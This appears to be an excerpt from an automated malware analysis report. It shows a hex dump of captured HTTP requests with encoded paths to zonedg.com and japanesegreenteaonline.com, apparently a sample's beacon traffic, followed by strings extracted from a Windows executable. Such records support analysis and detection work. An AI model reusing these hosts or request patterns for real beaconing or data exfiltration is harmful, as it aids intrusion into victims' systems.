0x000000d0 (00208)   346c4b76 39373558 6c6d3547 20485454   4lKv975Xlm5G HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000110 (00272)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000120 (00288)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000130 (00304)   4e542035 2e31290d 0a436f6e 74656e74   NT 5.1)..Content
0x00000140 (00320)   2d4c656e 6774683a 20300d0a 436f6e6e   -Length: 0..Conn
0x00000150 (00336)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x00000160 (00352)   0a727269 47733646 31676171 77776b63   .rriGs6F1gaqwwkc
0x00000170 (00368)   7061766c 52556d53 55796533 444a6d7a   pavlRUmSUye3DJmz
0x00000180 (00384)   52566631 44594f25 32466945 76717a62   RVf1DYO%2FiEvqzb
0x00000190 (00400)   4d727056 50555943 56657477 446c6450   MrpVPUYCVetwDldP
0x000001a0 (00416)   64306254 55444f61 67253242 43505049   d0bTUDOag%2BCPPI
0x000001b0 (00432)   644f6441 56494544 68705679 74354931   dOdAVIEDhpVyt5I1
0x000001c0 (00448)   53415225 32464675 30555036 5a4a3949   SAR%2FFu0UP6ZJ9I
0x000001d0 (00464)   6a4c5951 2532426a 58393334 55545257   jLYQ%2BjX934UTRW
0x000001e0 (00480)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x000001f0 (00496)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000200 (00512)   73743a20 6a617061 6e657365 67726565   st: japanesegree
0x00000210 (00528)   6e746561 6f6e6c69 6e652e63 6f6d0d0a   nteaonline.com..
0x00000220 (00544)   41636365 70743a20 2a2f2a0d 0a557365   Accept: */*..Use
0x00000230 (00560)   722d4167 656e743a 206d6f7a 696c6c61   r-Agent: mozilla
0x00000240 (00576)   2f322e30 0d0a0d0a                     /2.0....


Strings
\.hhG.h
h.
h....J
C.
..
M
...
.
r
{-
.&
080904b0
1.0.0.1
1871
FileVersion
&No Exit  Shift+N
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
&Yes
0hd\CaK
0h@hwN
0h"hy+
0hK@hRhu
0hRh`h/
0hx`h h
#%-1bBq
1dl^L"h
{1P*?g
1_:PhxKQ}
1UCCaY
-2h*34
!2hCd&1
\2h%.? h
2h>Rhph3E
}34M2hm
3;	9Xw
>?3Bh2h+^.
3KogGa#F
3TQ<ew
!4a$}8X
,4}.aAs
|4YsE~i
~56RhI
5fxPhz
5U"h\}J
,5x{hbha
6Cg\c,9$S
6f]qg,0
70Uj@;
7kBj/$
7qz<pI
7=	U]7
8	0h*n
80h(rhN
8orh|bh
99Xa^Gh
9-d.Zt
)?9`hJ
9p?[H^
9Rh$7U
aA@6.A
Ad1nfu
a`hTLf
AlphaBlend
_a'Px1S
bh6@h>
Bh'\bh
_Bh:Bh(
%bh\Bhrhs
BhDj~1Bhy[
Bhdy@h
-BhO0h
bhT15,
)Bh$+Y
;+bk?u
b;zHQW
C42h$zy
C8Mrh*	
=[?c[g
CIQ![!
<'CMT7
=Cn3#v
c)n&ph
CoCreateInstance
CoGetMalloc
CoTaskMemAlloc
CoTaskMemFree
CoTaskMemRealloc
CreateFontIndirectA
C*t<\Rh$
CwWC*2h
;D0h4f
^(+d6I
@.data
DeleteCriticalSection
DeleteObject
d"hW{x
do4l$V
dqPhRh
!drh|,rh
)ed2h?G
e'D,F"h:
e	gS"h>
e+@hmPh*
EnterCriticalSection
EnumResourceTypesA
EOZkCMcW
EsCe9U
eTF	h	j
eTTvN[
EY]_[^
F#$5Tbh
f5T\Rh
F81g0S
FaY@hW
fBh@hLAe;
-f)Cw`
Fd,\_2htJ
f:h7T6|
F hdGY8d
F-`h-I
[fIvw4r
\FOyBh
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Fr}"Nr6
fu5yBh
FuN)?#0
FVL^+Q
fW+LLC)
fx3X`h}ubh3x
#fZ'/&	
g:0W;`1
g)\3Rhm
GDI32.dll
GetACP
GetCPInfo
GetCPInfoExA
GetCurrentProcessId
GetDeviceCaps
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastError
GetLocaleInfoA
GetOEMCP
GetStartupInfoA
GetStdHandle
GetTextExtentPointA
GetTextMetricsA
GetThreadLocale
GetTickCount
GetVersionExA
g h{2h~tl
g`h\H_
GiB~+2Ef
GN}bhn
g)Rh*c
gwd08X
`h-?{{
'##^{h1#"h[
h1.Mua&
	h2.dlU
 h2h0h
h2hbh|
h2h$gz
@h>32h(
h],3IT
h3S5bh
h60h0h
h${6;dw:F
h6Qh@h
h-76C3
h8%}8n
h=`(9>
h9z[JL52h
ha~A8n
hA]&TRh
hBh/hI
hck`h+
"h_D:8*
HE3LK7z
HeapSize
hEG-U1
@henQS
hF]n`h
@h#G7bh
*`h\`h
h`h*54MO
h hAph
h+[ hc
h@h[@h
h hi@h
h]`hk`h
h h=NA
@h`hNN
h`hui+ph
h`huq]z
HHxW?d
hH+Y,vdpht
hi?@hQ
h!kF|@
hKqphe
hKZjy[
h{lE6|:9
hLS	ExMx
hMBhJ/
h+mbht
Hm@hs9
hMO,^F(Bh
hn6M h
@hn9a'k'=
`h!/?O
"hO#@hbh
@h)ph2hV
@hPh|`h
hphoq7
h<ph<#v
@hqA(LL
$h_qVs
`h*(rh
hrh^,;
 hRh'e
 hrhl"h
hrhRhn
ht`h}Rh
htRh7Rh
["huSbh#
h#V{o)rh
hwFc hE
hwRh2h
hZ5,~abhPh
hZBhrh
hZ`h=C
hZ^@hf
hZph~bhuPhW
hZrhf^
I-0hMh
i6BhGH
ibhS40h
IE`hMN
I,}"hs
InitializeCriticalSection
InterlockedExchange
InterlockedIncrement
iq,4l+
IrhPh!
Iyy2v"
)J`hU*~#U
%j}|s:
jT4gk*6J+l
:.JWcx
Kb	B-\pu
KD}.u`h
!^@/kE
KERNEL32.dll
K hi(,
k"hU+$
K]ifph
<kihux
$	k?jAR
*.kJb#S
KKIrhT
k)PhA#[
KXHu2:a*B
LeaveCriticalSection
	l@hRh/L
Lj.F!!
%lkhC?B
lL%tXI_
)\LMJX_
LoadLibraryW
lph"hd
(lqJaD
?;LrhgX
Lr?'xz
lstrlenW
L{U !AT|~
L:x3Rh
Lz&@h-
+#m.:$
mgRh%v
mi,1($
MSIMG32.dll
MultiByteToWideChar
)M#$'w
M${ZPC
na[LA3
&nH8 '
NlK@hf
O"h;;4
oh4`?z
]!O-.I~
Oi{b{.
{\o\ J
ole32.dll
-_o`t)
Ph0hGI
PhjA h(
PhLI@h
ph&O>l
ph<+Ph
phrhbhBh5:4M
phzPh5
Q\:0jc"Uo
q&3ssN+-@ho.YIPh
qC,s))d
<!Q@FXJo
Q`h-j;
_qlxrh
QueryPerformanceCounter
qV`h@h
r'4q_p>1|
RaiseException
.reloc
rh5Frh
rhDPh?
rh@hCm
{Rhphg
rhph`h!e
Rhrh1Oz
#RhW-~
Rhx'{J
RN)WBk
ru	^%,
`($r%yP
SelectObject
SetHandleCount
sIG,v-
SL(}W_`hk<
s:o(HZ
StringFromGUID2
.Sz\bhD
~SZ*Mz
tAl^>T
tb\k~2
TDQ.@h;
T#f5Z|
Th6/4!
!This program cannot be run in DOS mode.
tHmntq?8
T@h$~Ph
*-=TKD
tLf:])
T}L hA0h
TLq10h
TlsGetValue
TlsSetValue
TM#w#5-
TransparentBlt
Tss h<
>TT"h-f
t%|wRh
tYs^vh
=U6i8sa_
 Uc2<|n
u e6YiB
u|eUuNS
u_juUK>
uM=R%g
UnhandledExceptionFilter
V_A}|\-\
V hRh5Q
VJMhgx{
vocKu7v-d+
VY}~hj
_WA dUV
w&bhGU
'Wh&q=
WideCharToMultiByte
}	^%wm
\<wNEb
<Wp}:|
W&pK2<
WriteFile
.,WYU%
x46[SW
xBhjTm
XEFc2hT
xfPhgZ
X}}HE,aw
XH/~w)
x@IfWB
x!J@hbh
[$X.Vu|y
_<x*ybh
 y0`mJ
Y2FnZ]
+Y3{gph
>y5:-+
YBgWNS
ygUvhG
YoG,0f ]
yph0ha&
yphFrhk
ytinRh h
yU"EO;
	YY-bh
$Z)7Zc
zafx;S hN*
zA]K<z
^z:ar?q
zBSCbi{f
Z'+=+D	
z@hf%,=
[_Zn,s
z|o1=j
/Zsiif
zu#a}f>s